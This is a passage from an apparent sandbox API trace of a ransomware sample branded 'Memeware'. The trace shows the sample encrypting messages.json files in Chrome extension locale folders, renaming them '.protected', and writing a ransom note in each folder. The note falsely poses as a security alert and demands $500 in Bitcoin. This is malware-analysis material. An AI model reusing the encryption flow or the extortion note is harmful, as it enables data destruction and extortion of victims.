Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv") returned 142 [0079.407] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0079.407] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0079.407] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\*") returned 144 [0079.407] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.407] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.407] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.407] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.407] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.407] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.407] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\.") returned 144 [0079.407] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.407] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.407] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.407] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.407] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.408] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.408] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.408] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\..") returned 145 [0079.408] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.408] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.408] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.408] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.408] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.408] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") 
returned -1 [0079.408] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.408] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.408] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json") returned 156 [0079.408] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.408] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.408] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.408] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.408] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json") returned 156 [0079.408] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.408] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json") returned 156 [0079.408] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json") returned 156 [0079.409] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.409] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x102, lpOverlapped=0x0) returned 1 [0079.409] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.410] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x102, lpOverlapped=0x0) returned 1 [0079.410] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.410] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.410] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.410] CloseHandle (hObject=0x168) returned 1 [0079.410] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.protected") returned 166 [0079.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.protected")) returned 1 [0079.411] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.411] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.411] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\RESTORE_FILES.txt") returned 160 [0079.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.411] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.411] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.412] lstrlenA (lpString="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") returned 684 [0079.412] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.412] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.412] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.413] CloseHandle (hObject=0x164) returned 1 [0079.413] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.413] lstrcmpiW (lpString1="ms", lpString2="Windows") returned -1 [0079.413] lstrcmpiW (lpString1="ms", lpString2="Program Files") returned -1 [0079.413] lstrcmpiW (lpString1="ms", lpString2="Program Files (x86)") returned -1 [0079.413] lstrcmpiW (lpString1="ms", lpString2="$Recycle.bin") returned 1 [0079.413] lstrcmpiW (lpString1="ms", lpString2="System Volume Information") returned -1 [0079.413] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms") returned 142 [0079.413] lstrcmpW (lpString1="ms", lpString2=".") returned 1 [0079.413] lstrcmpW (lpString1="ms", lpString2="..") returned 1 [0079.413] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\*") returned 144 [0079.413] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.413] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.413] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.413] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.413] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.413] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.413] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\.") returned 144 [0079.413] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.413] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.413] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.413] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.414] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.414] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.414] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.414] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\..") returned 145 [0079.414] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.414] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.414] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.414] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.414] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.414] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") 
returned -1 [0079.414] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.414] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.414] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json") returned 156 [0079.414] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.414] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.414] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.414] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.415] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json") returned 156 [0079.415] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.415] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json") returned 156 [0079.415] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.415] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json") returned 156 [0079.415] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.415] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0079.416] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.416] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfe, lpOverlapped=0x0) returned 1 [0079.416] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.416] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.416] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.417] CloseHandle (hObject=0x168) returned 1 [0079.417] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.protected") returned 166 [0079.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.protected")) returned 1 [0079.418] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.418] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.418] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\RESTORE_FILES.txt") returned 160 [0079.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.418] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.418] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.419] lstrlenA (lpString="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") returned 684 [0079.419] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.419] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.419] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.420] CloseHandle (hObject=0x164) returned 1 [0079.420] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.420] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0079.420] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0079.420] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0079.420] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0079.420] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0079.420] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl") returned 142 [0079.420] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0079.420] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0079.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\*") returned 144 [0079.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.420] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.420] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.420] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.420] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.420] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\.") returned 144 [0079.420] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.420] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.420] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.421] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.421] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.421] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.421] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.421] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\..") returned 145 [0079.421] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.421] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.421] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.421] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.421] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.421] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") 
